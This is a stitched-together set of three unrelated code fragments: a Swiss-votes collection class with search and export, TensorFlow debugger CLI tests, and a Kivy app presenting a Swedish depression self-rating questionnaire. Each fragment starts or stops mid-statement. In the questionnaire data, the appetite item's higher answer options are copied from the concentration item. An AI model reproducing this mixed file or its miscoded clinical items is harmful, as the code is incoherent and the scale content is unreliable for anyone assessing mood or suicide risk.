from cached_property import cached_property from csv import writer from datetime import date from decimal import Decimal from decimal import InvalidOperation from onegov.core.collection import Pagination from onegov.swissvotes.models import ColumnMapperDataset from onegov.swissvotes.models import PolicyArea from onegov.swissvotes.models import SwissVote from sqlalchemy import func from sqlalchemy import or_ from xlsxwriter.workbook import Workbook class SwissVoteCollection(Pagination): """ A collection of votes. Supports pagination, filtering, sorting, exporting (CSV/XLSX) and batch adding/updating. """ batch_size = 20 initial_sort_by = 'date' initial_sort_order = 'descending' default_sort_order = 'ascending' SORT_BYS = ( 'date', 'legal_form', 'result', 'result_people_yeas_p', 'title', 'result_turnout' ) SORT_ORDERS = ('ascending', 'descending') def __init__( self, app, page=None, from_date=None, to_date=None, legal_form=None, result=None, policy_area=None, term=None, full_text=None, position_federal_council=None, position_national_council=None, position_council_of_states=None, sort_by=None, sort_order=None ): self.app = app self.session = app.session() self.page = page self.from_date = from_date self.to_date = to_date self.legal_form = legal_form self.result = result self.policy_area = policy_area self.term = term self.full_text = full_text self.position_federal_council = position_federal_council self.position_national_council = position_national_council self.position_council_of_states = position_council_of_states self.sort_by = sort_by self.sort_order = sort_order def add(self, **kwargs): vote = SwissVote(**kwargs) self.session.add(vote) self.session.flush() return vote def subset(self): return self.query() def __eq__(self, other): return ( (self.page or 0) == (other.page or 0) and (self.from_date or None) == (other.from_date or None) and (self.to_date or None) == (other.to_date or None) and set(self.legal_form or []) == set(other.legal_form or []) and set(self.result or []) == set(other.result or []) and set(self.policy_area or []) == set(other.policy_area or []) and (self.term or None) == (other.term or None) and (self.full_text or None) == (other.full_text or None) and ( (self.position_federal_council or []) == (other.position_federal_council or []) ) and ( (self.position_national_council or []) == (other.position_national_council or []) ) and ( (self.position_council_of_states or []) == (other.position_council_of_states or []) ) and (self.sort_by or None) == (other.sort_by or None) and (self.sort_order or None) == (other.sort_order or None) ) def default(self): """ Returns the votes unfiltered and ordered by default. """ return self.__class__(self.app) @property def page_index(self): """ The current page. """ return self.page or 0 def page_by_index(self, page): """ Returns the requested page. """ return self.__class__( self.app, page=page, from_date=self.from_date, to_date=self.to_date, legal_form=self.legal_form, result=self.result, policy_area=self.policy_area, term=self.term, full_text=self.full_text, position_federal_council=self.position_federal_council, position_national_council=self.position_national_council, position_council_of_states=self.position_council_of_states, sort_by=self.sort_by, sort_order=self.sort_order ) @property def current_sort_by(self): """ Returns the currently used sorting key. Defaults to a reasonable value. """ if self.sort_by in self.SORT_BYS: return self.sort_by return self.initial_sort_by @property def current_sort_order(self): """ Returns the currently used sorting order. Defaults to a reasonable value. """ if self.sort_by in self.SORT_BYS: if self.sort_order in self.SORT_ORDERS: return self.sort_order if self.sort_by == self.initial_sort_by: return self.initial_sort_order return self.default_sort_order return self.initial_sort_order def sort_order_by_key(self, sort_by): """ Returns the sort order by key. Defaults to 'unsorted'. """ if self.current_sort_by == sort_by: return self.current_sort_order return 'unsorted' def by_order(self, sort_by): """ Returns the votes ordered by the given key. """ sort_order = self.default_sort_order if sort_by == self.current_sort_by: if self.current_sort_order == 'ascending': sort_order = 'descending' else: sort_order = 'ascending' return self.__class__( self.app, page=None, from_date=self.from_date, to_date=self.to_date, legal_form=self.legal_form, result=self.result, policy_area=self.policy_area, term=self.term, full_text=self.full_text, position_federal_council=self.position_federal_council, position_national_council=self.position_national_council, position_council_of_states=self.position_council_of_states, sort_by=sort_by, sort_order=sort_order ) @property def order_by(self): """ Returns an SqlAlchemy expression for ordering queries based on the current sorting key and ordering. """ if self.current_sort_by == 'title': from onegov.core.orm.func import unaccent if self.app.session_manager.current_locale == 'fr_CH': result = unaccent(SwissVote.short_title_fr) else: result = unaccent(SwissVote.short_title_de) else: result = ( getattr(SwissVote, f'_{self.current_sort_by}', None) or getattr(SwissVote, self.current_sort_by, None) ) if not result: raise NotImplementedError() if self.current_sort_order == 'descending': result = result.desc() return result @property def offset(self): """ The current position in the batch. """ return (self.page or 0) * self.batch_size @property def previous(self): """ The previous page. """ if (self.page or 0) - 1 >= 0: return self.page_by_index((self.page or 0) - 1) @property def next(self): """ The next page. """ if (self.page or 0) + 1 < self.pages_count: return self.page_by_index((self.page or 0) + 1) @property def term_expression(self): """ Returns the current search term transformed to use within Postgres ``to_tsquery`` function. Removes all unwanted characters, replaces prefix matching, joins word together using FOLLOWED BY. """ def cleanup(text): result = ''.join((c for c in text if c.isalnum() or c in ',.')) return f'{result}:*' if text.endswith('*') else result parts = [cleanup(part) for part in (self.term or '').split()] return ' <-> '.join([part for part in parts if part]) @property def term_filter_numeric(self): """ Returns a list of SqlAlchemy filter statements matching possible numeric attributes based on the term. """ result = [] if self.term: for part in self.term.split(): if part.replace('.', '', 1).isnumeric(): number = Decimal(part) result.append(SwissVote.bfs_number == number) if part.replace('.', '', 1).replace('_', '', 1).isnumeric(): result.append(SwissVote.procedure_number == part) return result @property def term_filter_text(self): """ Returns a list of SqlAlchemy filter statements matching possible fulltext attributes based on the term. """ term = self.term_expression if not term: return [] def match(column, language='german'): return column.op('@@')(func.to_tsquery(language, term)) def match_convert(column, language='german'): return match(func.to_tsvector(language, column), language) if not self.full_text: return [ match_convert(SwissVote.title_de), match_convert(SwissVote.title_fr, 'french'), match_convert(SwissVote.short_title_de), match_convert(SwissVote.short_title_fr, 'french'), match_convert(SwissVote.keyword), ] return [ match_convert(SwissVote.title_de), match_convert(SwissVote.title_fr, 'french'), match_convert(SwissVote.short_title_de), match_convert(SwissVote.short_title_fr, 'french'), match_convert(SwissVote.keyword), match_convert(SwissVote.initiator), match(SwissVote.searchable_text_de_CH), match(SwissVote.searchable_text_fr_CH, 'french'), ] @property def term_filter(self): """ Returns a list of SqlAlchemy filter statements based on the search term. """ return self.term_filter_numeric + self.term_filter_text def query(self): """ Returns the votes matching to the current filters and order. """ query = self.session.query(SwissVote) def in_or_none(column, values, extra={}): values = values + [x for y, x in extra.items() if y in values] statement = column.in_(values) if -1 in values: statement = or_(statement, column.is_(None)) return statement if self.from_date: query = query.filter(SwissVote.date >= self.from_date) if self.to_date: query = query.filter(SwissVote.date <= self.to_date) if self.legal_form: query = query.filter(SwissVote._legal_form.in_(self.legal_form)) if self.result: query = query.filter(or_( SwissVote._result.in_(self.result), SwissVote._result == None, )) if self.policy_area: levels = [[], [], []] for area in self.policy_area: area = PolicyArea(area) if area.level == 1: levels[0].append(area.descriptor_decimal) if area.level == 2: levels[1].append(area.descriptor_decimal) if area.level == 3: levels[2].append(area.descriptor_decimal) if levels[0]: query = query.filter( or_( SwissVote.descriptor_1_level_1.in_(levels[0]), SwissVote.descriptor_2_level_1.in_(levels[0]), SwissVote.descriptor_3_level_1.in_(levels[0]) ) ) if levels[1]: query = query.filter( or_( SwissVote.descriptor_1_level_2.in_(levels[1]), SwissVote.descriptor_2_level_2.in_(levels[1]), SwissVote.descriptor_3_level_2.in_(levels[1]) ) ) if levels[2]: query = query.filter( or_( SwissVote.descriptor_1_level_3.in_(levels[2]), SwissVote.descriptor_2_level_3.in_(levels[2]), SwissVote.descriptor_3_level_3.in_(levels[2]) ) ) if self.term: query = query.filter(or_(*self.term_filter)) if self.position_federal_council: query = query.filter( in_or_none( SwissVote._position_federal_council, self.position_federal_council, {1: 9, 2: 8} ) ) if self.position_national_council: query = query.filter( in_or_none( SwissVote._position_national_council, self.position_national_council, {1: 9, 2: 8} ) ) if self.position_council_of_states: query = query.filter( in_or_none( SwissVote._position_council_of_states, self.position_council_of_states, {1: 9, 2: 8} ) ) query = query.order_by( self.order_by, SwissVote.bfs_number.desc() ) return query def by_bfs_number(self, bfs_number): """ Returns the vote with the given BFS number. """ try: bfs_number = Decimal(bfs_number) except InvalidOperation: return None query = self.query().filter(SwissVote.bfs_number == bfs_number) return query.first() @cached_property def available_descriptors(self): """ Returns a list of the used descriptor values (level 1-3). """ query = self.session.query return [ set([ x[0] for x in query(SwissVote.descriptor_1_level_1).union( query(SwissVote.descriptor_2_level_1), query(SwissVote.descriptor_3_level_1) ).all() if x[0] ]), set([ x[0] for x in query(SwissVote.descriptor_1_level_2).union( query(SwissVote.descriptor_2_level_2), query(SwissVote.descriptor_3_level_2) ).all() if x[0] ]), set([ x[0] for x in query(SwissVote.descriptor_1_level_3).union( query(SwissVote.descriptor_2_level_3), query(SwissVote.descriptor_3_level_3) ).all() if x[0] ]), ] def update(self, votes): """ Adds or updates the given votes. """ added = 0 updated = 0 query = self.session.query(SwissVote) existing = {vote.bfs_number: vote for vote in query} mapper = ColumnMapperDataset() for vote in votes: old = existing.get(vote.bfs_number) if old: changed = False for attribute, value in mapper.get_items(vote): if mapper.get_value(old, attribute) != value: mapper.set_value(old, attribute, value) changed = True if changed: updated += 1 else: added += 1 self.session.add(vote) return added, updated def update_metadata(self, metadata): added = 0 updated = 0 for bfs_number, files in metadata.items(): vote = self.session.query(SwissVote) vote = vote.filter_by(bfs_number=bfs_number).first() if vote: for filename, data in files.items(): old = vote.campaign_material_metadata.get(filename) if not old: added += 1 vote.campaign_material_metadata[filename] = data elif old != data: updated += 1 vote.campaign_material_metadata[filename] = data return added, updated @property def last_modified(self): """ Returns the last change of any votes. """ return self.session.query(func.max(SwissVote.last_change)).scalar() def export_csv(self, file): """ Exports all votes according to the code book. """ mapper = ColumnMapperDataset() csv = writer(file) csv.writerow(mapper.columns.values()) query = self.query() query = query.order_by(None).order_by(SwissVote.bfs_number) for vote in query: row = [] for value in mapper.get_values(vote): if value is None: row.append('.') elif isinstance(value, str): row.append(value) elif isinstance(value, date): row.append(f'{value:%d.%m.%Y}') elif isinstance(value, int): row.append(str(value)) elif isinstance(value, Decimal): row.append( f'{value:f}'.replace('.', ',').rstrip('0').rstrip(',') ) csv.writerow(row) def export_xlsx(self, file): """ Exports all votes according to the code book. """
"3"], screen_info={"cols": 80}) self.assertEqual( 2, out.annotations[debugger_cli_common.INIT_SCROLL_POS_KEY]) index = self._findSourceLine(out, self._u_line_number) self.assertEqual( ["L%d u = variables.VariableV1(u_init, name=u_name)" % self._u_line_number, " simple_mul_add/u", " simple_mul_add/u/Assign", " simple_mul_add/u/read"], out.lines[index : index + 4]) self.assertEqual("pt simple_mul_add/u", out.font_attr_segs[index + 1][0][2].content) # simple_mul_add/u/Assign is not used in this run because the Variable has # already been initialized. self.assertEqual(cli_shared.COLOR_BLUE, out.font_attr_segs[index + 2][0][2]) self.assertEqual("pt simple_mul_add/u/read", out.font_attr_segs[index + 3][0][2].content) def testPrintSourceForOpNameSettingMaximumElementCountWorks(self): self._debug_dump.set_python_graph(self._sess.graph) out = self._registry.dispatch_command( "print_source", [self._curr_file_path, "-m", "1"], screen_info={"cols": 80}) index = self._findSourceLine(out, self._u_line_number) self.assertEqual( ["L%d u = variables.VariableV1(u_init, name=u_name)" % self._u_line_number, " simple_mul_add/u", " (... Omitted 2 of 3 op(s) ...) +5"], out.lines[index : index + 3]) self.assertEqual("pt simple_mul_add/u", out.font_attr_segs[index + 1][0][2].content) more_elements_command = out.font_attr_segs[index + 2][-1][2].content self.assertStartsWith(more_elements_command, "ps %s " % self._curr_file_path) self.assertIn(" -m 6", more_elements_command) def testListSourceWorks(self): self._debug_dump.set_python_graph(self._sess.graph) out = self._registry.dispatch_command("list_source", []) non_tf_lib_files_start = [ i for i in xrange(len(out.lines)) if out.lines[i].startswith("Source file path")][0] + 1 non_tf_lib_files_end = [ i for i in xrange(len(out.lines)) if out.lines[i].startswith("TensorFlow Python library file(s):")][0] - 1 non_tf_lib_files = [ line.split(" ")[0] for line in out.lines[non_tf_lib_files_start : non_tf_lib_files_end]] self.assertIn(self._curr_file_path, non_tf_lib_files) # Check that the TF library files are marked with special color attribute. for i in xrange(non_tf_lib_files_end + 1, len(out.lines)): if not out.lines[i]: continue for attr_seg in out.font_attr_segs[i]: self.assertTrue(cli_shared.COLOR_GRAY in attr_seg[2] or attr_seg[2] == cli_shared.COLOR_GRAY) def testListSourceWithNodeNameFilterWithMatchesWorks(self): self._debug_dump.set_python_graph(self._sess.graph) out = self._registry.dispatch_command("list_source", ["-n", ".*/read"]) self.assertStartsWith(out.lines[1], "Node name regex filter: \".*/read\"") non_tf_lib_files_start = [ i for i in xrange(len(out.lines)) if out.lines[i].startswith("Source file path")][0] + 1 non_tf_lib_files_end = [ i for i in xrange(len(out.lines)) if out.lines[i].startswith("TensorFlow Python library file(s):")][0] - 1 non_tf_lib_files = [ line.split(" ")[0] for line in out.lines[non_tf_lib_files_start : non_tf_lib_files_end]] self.assertIn(self._curr_file_path, non_tf_lib_files) # Check that the TF library files are marked with special color attribute. for i in xrange(non_tf_lib_files_end + 1, len(out.lines)): if not out.lines[i]: continue for attr_seg in out.font_attr_segs[i]: self.assertTrue(cli_shared.COLOR_GRAY in attr_seg[2] or attr_seg[2] == cli_shared.COLOR_GRAY) def testListSourceWithNodeNameFilterWithNoMatchesWorks(self): self._debug_dump.set_python_graph(self._sess.graph) out = self._registry.dispatch_command("list_source", ["-n", "^$"]) self.assertEqual([ "List of source files that created nodes in this run", "Node name regex filter: \"^$\"", "", "[No source file information.]"], out.lines) def testListSourceWithPathAndNodeNameFiltersWorks(self): self._debug_dump.set_python_graph(self._sess.graph) out = self._registry.dispatch_command( "list_source", ["-p", self._curr_file_path, "-n", ".*read"]) self.assertEqual([ "List of source files that created nodes in this run", "File path regex filter: \"%s\"" % self._curr_file_path, "Node name regex filter: \".*read\"", ""], out.lines[:4]) def testListSourceWithCompiledPythonSourceWorks(self): def fake_list_source_files_against_dump(dump, path_regex_allowlist=None, node_name_regex_allowlist=None): del dump, path_regex_allowlist, node_name_regex_allowlist return [("compiled_1.pyc", False, 10, 20, 30, 4), ("compiled_2.pyo", False, 10, 20, 30, 5), ("uncompiled.py", False, 10, 20, 30, 6)] with test.mock.patch.object( source_utils, "list_source_files_against_dump", side_effect=fake_list_source_files_against_dump): out = self._registry.dispatch_command("list_source", []) self.assertStartsWith(out.lines[4], "compiled_1.pyc") self.assertEqual((0, 14, [cli_shared.COLOR_WHITE]), out.font_attr_segs[4][0]) self.assertStartsWith(out.lines[5], "compiled_2.pyo") self.assertEqual((0, 14, [cli_shared.COLOR_WHITE]), out.font_attr_segs[5][0]) self.assertStartsWith(out.lines[6], "uncompiled.py") self.assertEqual(0, out.font_attr_segs[6][0][0]) self.assertEqual(13, out.font_attr_segs[6][0][1]) self.assertEqual(cli_shared.COLOR_WHITE, out.font_attr_segs[6][0][2][0]) self.assertEqual("ps uncompiled.py -b 6", out.font_attr_segs[6][0][2][1].content) def testListInputInvolvingNodesWithMultipleOutputs(self): """List an input tree containing tensors from non-:0 output slot.""" with session.Session(config=no_rewrite_session_config()) as sess: x = variables.VariableV1([1, 3, 3, 7], name="x") _, idx = array_ops.unique(x, name="x_unique") idx_times_two = math_ops.multiply(idx, 2, name="idx_times_two") self.evaluate(x.initializer) run_options = config_pb2.RunOptions(output_partition_graphs=True) debug_utils.watch_graph( run_options, sess.graph, debug_ops=["DebugIdentity"], debug_urls="file://%s" % self._dump_root_for_unique) run_metadata = config_pb2.RunMetadata() self.assertAllEqual( [0, 2, 2, 4], sess.run(idx_times_two, options=run_options, run_metadata=run_metadata)) debug_dump = debug_data.DebugDumpDir( self._dump_root_for_unique, partition_graphs=run_metadata.partition_graphs) _, registry = create_analyzer_cli(debug_dump) out = registry.dispatch_command("li", ["idx_times_two"]) self.assertEqual( ["Inputs to node \"idx_times_two\" (Depth limit = 1):", "|- (1) x_unique:1"], out.lines[:2]) class AnalyzerCLIPrintLargeTensorTest(test_util.TensorFlowTestCase): @classmethod def setUpClass(cls): cls._dump_root = tempfile.mkdtemp() with session.Session(config=no_rewrite_session_config()) as sess: # 2400 elements should exceed the default threshold (2000). x = constant_op.constant(np.zeros([300, 8]), name="large_tensors/x") run_options = config_pb2.RunOptions(output_partition_graphs=True) debug_utils.watch_graph( run_options, sess.graph, debug_ops=["DebugIdentity"], debug_urls="file://%s" % cls._dump_root) # Invoke Session.run(). run_metadata = config_pb2.RunMetadata() sess.run(x, options=run_options, run_metadata=run_metadata) cls._debug_dump = debug_data.DebugDumpDir( cls._dump_root, partition_graphs=run_metadata.partition_graphs) # Construct the analyzer and command registry. cls._analyzer, cls._registry = create_analyzer_cli(cls._debug_dump) @classmethod def tearDownClass(cls): # Tear down temporary dump directory. file_io.delete_recursively(cls._dump_root) def testPrintLargeTensorWithoutAllOption(self): out = self._registry.dispatch_command( "print_tensor", ["large_tensors/x:0"], screen_info={"cols": 80}) # Assert that ellipses are present in the tensor value printout. self.assertIn("...,", out.lines[4]) # 2100 still exceeds 2000. out = self._registry.dispatch_command( "print_tensor", ["large_tensors/x:0[:, 0:7]"], screen_info={"cols": 80}) self.assertIn("...,", out.lines[4]) def testPrintLargeTensorWithAllOption(self): out = self._registry.dispatch_command( "print_tensor", ["large_tensors/x:0", "-a"], screen_info={"cols": 80}) # Assert that ellipses are not present in the tensor value printout. self.assertNotIn("...,", out.lines[4]) out = self._registry.dispatch_command( "print_tensor", ["large_tensors/x:0[:, 0:7]", "--all"], screen_info={"cols": 80}) self.assertNotIn("...,", out.lines[4]) @test_util.run_v1_only("b/120545219") class AnalyzerCLIControlDepTest(test_util.TensorFlowTestCase): @classmethod def setUpClass(cls): cls._dump_root = tempfile.mkdtemp() cls._is_gpu_available = test.is_gpu_available() if cls._is_gpu_available: gpu_name = test_util.gpu_device_name() cls._main_device = "/job:localhost/replica:0/task:0" + gpu_name else: cls._main_device = "/job:localhost/replica:0/task:0/device:CPU:0" with session.Session(config=no_rewrite_session_config()) as sess: x_init_val = np.array([5.0, 3.0]) x_init = constant_op.constant(x_init_val, shape=[2]) x = variables.VariableV1(x_init, name="control_deps/x") y = math_ops.add(x, x, name="control_deps/y") y = control_flow_ops.with_dependencies( [x], y, name="control_deps/ctrl_dep_y") z = math_ops.multiply(x, y, name="control_deps/z") z = control_flow_ops.with_dependencies( [x, y], z, name="control_deps/ctrl_dep_z") x.initializer.run() run_options = config_pb2.RunOptions(output_partition_graphs=True) debug_utils.watch_graph( run_options, sess.graph, debug_ops=["DebugIdentity"], debug_urls="file://%s" % cls._dump_root) # Invoke Session.run(). run_metadata = config_pb2.RunMetadata() sess.run(z, options=run_options, run_metadata=run_metadata) debug_dump = debug_data.DebugDumpDir( cls._dump_root, partition_graphs=run_metadata.partition_graphs) # Construct the analyzer and command handler registry. _, cls._registry = create_analyzer_cli(debug_dump) @classmethod def tearDownClass(cls): # Tear down temporary dump directory. file_io.delete_recursively(cls._dump_root) def testNodeInfoWithControlDependencies(self): # Call node_info on a node with control inputs. out = self._registry.dispatch_command("node_info", ["control_deps/ctrl_dep_y"]) assert_node_attribute_lines( self, out, "control_deps/ctrl_dep_y", "Identity", self._main_device, [("Add", "control_deps/y")], [("VariableV2", "control_deps/x")], [("Mul", "control_deps/z")], [("Identity", "control_deps/ctrl_dep_z")]) # Call node info on a node with control recipients. out = self._registry.dispatch_command("ni", ["control_deps/x"]) assert_node_attribute_lines(self, out, "control_deps/x", "VariableV2", self._main_device, [], [], [("Identity", "control_deps/x/read")], [("Identity", "control_deps/ctrl_dep_y"), ("Identity", "control_deps/ctrl_dep_z")]) # Verify the menu items (command shortcuts) in the output. check_menu_item(self, out, 10, len(out.lines[10]) - len("control_deps/x/read"), len(out.lines[10]), "ni -a -d -t control_deps/x/read") if out.lines[13].endswith("control_deps/ctrl_dep_y"): y_line = 13 z_line = 14 else: y_line = 14 z_line = 13 check_menu_item(self, out, y_line, len(out.lines[y_line]) - len("control_deps/ctrl_dep_y"), len(out.lines[y_line]), "ni -a -d -t control_deps/ctrl_dep_y") check_menu_item(self, out, z_line, len(out.lines[z_line]) - len("control_deps/ctrl_dep_z"), len(out.lines[z_line]), "ni -a -d -t control_deps/ctrl_dep_z") def testListInputsNonRecursiveNoControl(self): """List inputs non-recursively, without any control inputs.""" # Do not include node op types. node_name = "control_deps/z" out = self._registry.dispatch_command("list_inputs", [node_name]) self.assertEqual([ "Inputs to node \"%s\" (Depth limit = 1):" % node_name, "|- (1) control_deps/x/read", "| |- ...", "|- (1) control_deps/ctrl_dep_y", " |- ...", "", "Legend:", " (d): recursion depth = d." ], out.lines) # Include node op types. out = self._registry.dispatch_command("li", ["-t", node_name]) self.assertEqual([ "Inputs to node \"%s\" (Depth limit = 1):" % node_name, "|- (1) [Identity] control_deps/x/read", "| |- ...", "|- (1) [Identity] control_deps/ctrl_dep_y", " |- ...", "", "Legend:", " (d): recursion depth = d.", " [Op]: Input node has op type Op." ], out.lines) check_main_menu( self, out, list_tensors_enabled=True, node_info_node_name=node_name, print_tensor_node_name=node_name, list_outputs_node_name=node_name) # Verify that the node name has bold attribute. self.assertEqual([(16, 16 + len(node_name), "bold")], out.font_attr_segs[0]) # Verify the menu items (command shortcuts) in the output. check_menu_item(self, out, 1, len(out.lines[1]) - len("control_deps/x/read"), len(out.lines[1]), "li -c -r control_deps/x/read") check_menu_item(self, out, 3, len(out.lines[3]) - len("control_deps/ctrl_dep_y"), len(out.lines[3]), "li -c -r control_deps/ctrl_dep_y") def testListInputsNonRecursiveNoControlUsingTensorName(self): """List inputs using the name of an output tensor of the node.""" # Do not include node op types. node_name = "control_deps/z" tensor_name = node_name + ":0" out = self._registry.dispatch_command("list_inputs", [tensor_name]) self.assertEqual([ "Inputs to node \"%s\" (Depth limit = 1):" % node_name, "|- (1) control_deps/x/read", "| |- ...", "|- (1) control_deps/ctrl_dep_y", " |- ...", "", "Legend:", " (d): recursion depth = d." ], out.lines) check_main_menu( self, out, list_tensors_enabled=True, node_info_node_name=node_name, print_tensor_node_name=node_name, list_outputs_node_name=node_name) check_menu_item(self, out, 1, len(out.lines[1]) - len("control_deps/x/read"), len(out.lines[1]), "li -c -r control_deps/x/read") check_menu_item(self, out, 3, len(out.lines[3]) - len("control_deps/ctrl_dep_y"), len(out.lines[3]), "li -c -r control_deps/ctrl_dep_y") def testListInputsNonRecursiveWithControls(self): """List inputs non-recursively, with control inputs.""" node_name = "control_deps/ctrl_dep_z" out = self._registry.dispatch_command("li", ["-t", node_name, "-c"]) self.assertEqual([ "Inputs to node \"%s\" (Depth limit = 1, " % node_name + "control inputs included):", "|- (1) [Mul] control_deps/z", "| |- ...", "|- (1) (Ctrl) [Identity] control_deps/ctrl_dep_y", "| |- ...", "|- (1) (Ctrl) [VariableV2] control_deps/x", "", "Legend:", " (d): recursion depth = d.", " (Ctrl): Control input.", " [Op]: Input node has op type Op." ], out.lines) check_main_menu( self, out, list_tensors_enabled=True, node_info_node_name=node_name, print_tensor_node_name=node_name, list_outputs_node_name=node_name) check_menu_item(self, out, 1, len(out.lines[1]) - len("control_deps/z"), len(out.lines[1]), "li -c -r control_deps/z") check_menu_item(self, out, 3, len(out.lines[3]) - len("control_deps/ctrl_dep_y"), len(out.lines[3]), "li -c -r control_deps/ctrl_dep_y") check_menu_item(self, out, 5, len(out.lines[5]) - len("control_deps/x"), len(out.lines[5]), "li -c -r control_deps/x") def testListInputsRecursiveWithControls(self): """List inputs recursively, with control inputs.""" node_name = "control_deps/ctrl_dep_z" out = self._registry.dispatch_command("li", ["-c", "-r", "-t", node_name]) self.assertEqual([ "Inputs to node \"%s\" (Depth limit = 20, " % node_name + "control inputs included):",
# coding:utf-8 import kivy kivy.require('1.7.2') # replace with your current kivy version ! from kivy.app import App from kivy.uix.screenmanager import ScreenManager, Screen, FadeTransition from kivy.properties import ListProperty, ObjectProperty, StringProperty, NumericProperty from kivy.factory import Factory from kivy.uix.button import Button from kivy.uix.tabbedpanel import TabbedPanel, TabbedPanelItem from kivy.uix.spinner import Spinner from kivy.uix.dropdown import DropDown from kivy.uix.checkbox import CheckBox from kivy.lang import Builder from kivy.uix.popup import Popup from kivy.uix.textinput import TextInput from kivy.uix.boxlayout import BoxLayout from kivy.uix.stacklayout import StackLayout from kivy.uix.label import Label #from kivy.clock import Clock from kivy.uix.progressbar import ProgressBar from kivy.storage.jsonstore import JsonStore from kivy.uix.gridlayout import GridLayout from functools import partial #from kivy.uix.treeview import TreeView, TreeViewNode #from kivy.uix.treeview import TreeViewLabel from kivy.uix.scrollview import ScrollView try: from plyer import sms except: pass #Declaration of global variables: settingdata = JsonStore('settingdata.json') Builder.load_string(''' <MainScreen>: name: 'mainscreen' canvas.before: Color: rgba: 1, 1, 1, 1 Rectangle: pos: self.pos size: self.size GridLayout: row_default_height:root.height / 8 cols:1 orientation: 'vertical' ActionBar: width:root.width height:root.height / 8 background_color:125,125,125,1,1 pos_hint: {'top':1} ActionView: use_separator: True ActionPrevious: app_icon: 'emadrs.png' title: '' with_previous: False ActionGroup: mode: 'spinner' text: 'Meny' #color: 0,0,0,1 ActionButton: text: 'SMS-nr' on_release: root.settings() GridLayout: cols:1 id: megabox BoxLayout: #width:root.width #height:root.height / 8 orientation: 'horizontal' size_hint: None,None size:root.width, .1*root.height id:checkboxes ''') class MainScreen(Screen): nownr=0 qlist=( "Här ber vi dig beskriva din sinnesstämning, om du känner dig ledsen, tungsint eller dyster till mods. Tänk efter hur du har känt dig de senaste tre dagarna, om du har skiftat i humöret eller om det har varit i stort sett detsamma hela tiden, och försök särskilt komma ihåg om du har känt dig lättare till sinnes om det har hänt något positivt.", "Här ber vi dig markera i vilken utsträckning du haft känslor av inre spänning, olust och ångest eller odefinierad rädsla under de senaste tre dagarna. Tänk särskilt på hur intensiva känslorna varit, och om de kommit och gått eller funnits hela tiden.", "Här ber vi Dig beskriva hur bra du sover. Tänk efter hur länge du sovit och hur god sömnen varit under de senaste tre nätterna. Bedömningen skall avse hur du faktiskt sovit, oavsett om du tagit sömnmedel eller ej. Om du sover mer än vanligt, sätt din markering vid 0.", "Här ber vi dig ta ställning till hur din aptit är, och tänka efter om den på något sätt skilt sig från vad som är normalt för dig. Om du skulle ha bättre aptit än normalt, markera då det på 0.", "Här ber vi dig ta ställning till din förmåga att hålla tankarna samlade och koncentrera dig på olika aktiviteter. Tänk igenom hur du fungerar vid olika sysslor som kräver olika grad av koncentrationsförmåga, t ex läsning av komplicerad text, lätt tidningstext och TV-tittande.", "Här ber vid dig försöka värdera din handlingskraft. Frågan gäller om du har lätt eller svårt för att komma igång med sådant du tycker du bör göra, och i vilken utsträckning du måste över vinna ett inre motstånd när du skall ta itu med något.", "Här ber vi dig ta ställning till hur du upplever ditt intresse för omvärlden och för andra människor, och för sådana aktiviteter som brukar bereda dig nöje och glädje.", "Frågan gäller hur du ser på din egen framtid och hur du uppfattar ditt eget värde. Tänk efter i vilken utsträckning du ger dig självförebråelser, om du plågas av skuldkänslor, och om du oroat dig oftare än vanligt för t ex din ekonomi eller din hälsa.", "Frågan gäller din livslust, och om du känt livsleda. Har du tankar på självmord, och i så fall, i vilken utsträckning upplever du detta som en verklig utväg?" ) dscrptn=( ( "0 Jag kan känna mig glad eller ledsen, allt efter omständigheterna.", "1", "2 Jag känner mig nedstämd för det mesta, men ibland kan det kännas lättare.", "3", "4 Jag känner mig genomgående nedstämd och dyster. Jag kan inte glädja mig åt sådant som vanligen skulle göra mig glad.", "5", "6 Jag är totalt nedstämd och olycklig att jag inte kan tänka mig värre." ), ( "0 Jag känner mig mestadels lugn.", "1", "2 Ibland har jag obehagliga känslor av inre oro.", "3", "4 Jag har ofta en känsla av inre oro som ibland kan bli mycket stark, och som jag måste anstränga mig för att bemästra.", "5", "6 Jag har fruktansvärda, långvariga eller outhärdliga ångestkänslor.", ), ( "0 Jag sover lugnt och bra och tillräckligt länge för mina behov. Jag har inga särskilda svårigheter att somna.", "1", "2 Jag har vissa sömnsvårigheter. Ibland har jag svårt att somna eller sover ytligare eller oroligare än vanligt.", "3", "4 Jag sover minst två timmar mindre per natt än normalt. Jag vaknar ofta under natten, även om jag inte blir störd.", "5", "6 Jag sover mycket dåligt, inte mer än 2-3 timmar per natt." ), ( "0 Min aptit är som den brukar vara.", "1", "2 Min aptit är sämre än vanligt.", "3", "4 Jag har påtagligt svårt att koncentrera mig på sådant som normalt inte kräver någon ansträngning från min sida (t ex läsning eller samtal med andra människor).", "5", "6 Jag kan överhuvudtaget inte koncentrera mig på någonting." ), ( "0 Jag har inga koncentrationssvårigheter.", "1", "2 Jag har tillfälligt svårt att hålla tankarna samlade på sådant som normalt skulle fånga min uppmärksamhet (t ex läsning eller TV-tittande).", "3", "4 Jag har påtagligt svårt att koncentrera mig på sådant som normalt inte kräver någon ansträngning från min sida (t ex läsning eller samtal med andra människor).", "5", "6 Jag kan överhuvudtaget inte koncentrera mig på någonting." ), ( "0 Jag har inga svårigheter med att ta itu med nya uppgifter.", "1", "2 När jag skall ta itu med något, tar det emot på ett sätt som inte är normalt för mig.", "3", "4 Det krävs en stor ansträngning för mig att ens komma igång med enkla uppgifter som jag vanligtvis utför mer eller mindre rutinmässigt.", "5", "6 Jag kan inte förmå mig att ta itu med de enklaste vardagssysslor." ), ( "0 Jag är intresserad av omvärlden och engagerar mig i den, och det bereder mig både nöje och glädje.", "1", "2 Jag känner mindre starkt för sådant som brukar engagera mig. Jag har svårare än vanligt att bli glad eller svårare att bli arg när det är befogat.", "3", "4 Jag kan inte känna något intresse för omvärlden, inte ens för vänner och bekanta.", "5", "6 Jag har slutat uppleva några känslor. Jag känner mig smärtsamt likgiltig även för mina närmaste." ), ( "0 Jag ser på framtiden med tillförsikt. Jag är på det hela taget ganska nöjd med mig själv.", "1", "2 Ibland klandrar jag mig själv och tycker att jag är mindre värd än andra.", "3", "4 Jag grubblar ofta över mina misslyckanden och känner mig mindervärdig eller dålig, även om andra tycker annorlunda.", "5", "6 Jag ser allting i svart och kan inte se någon ljusning. Det känns som om jag var en alltigenom dålig människa, och som om jag aldrig skulle kunna få någon förlåtelse för det hemska jag gjort." ), ( "0 Jag har normal aptit på livet.", "1", "2 Livet känns inte särskilt meningsfullt men jag önskar ändå inte att jag vore död.", "3", "4 Jag tycker ofta det vore 